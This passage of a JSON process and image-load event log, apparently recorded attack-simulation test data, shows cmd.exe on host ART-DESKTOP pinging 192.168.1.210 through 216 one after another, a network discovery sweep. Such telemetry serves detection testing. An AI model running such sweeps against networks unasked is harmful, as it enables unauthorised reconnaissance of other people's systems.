"{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "process", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573016830000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.210", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5616, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "process", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573021830000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.211", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6068, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "process", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573026990000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.212", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5044, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "process", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573031830000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.213", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3148, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "process", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573036990000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.214", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6784, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573037130000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "process", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573041830000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.215", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5856, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "process", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573046830000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.216", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1144, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 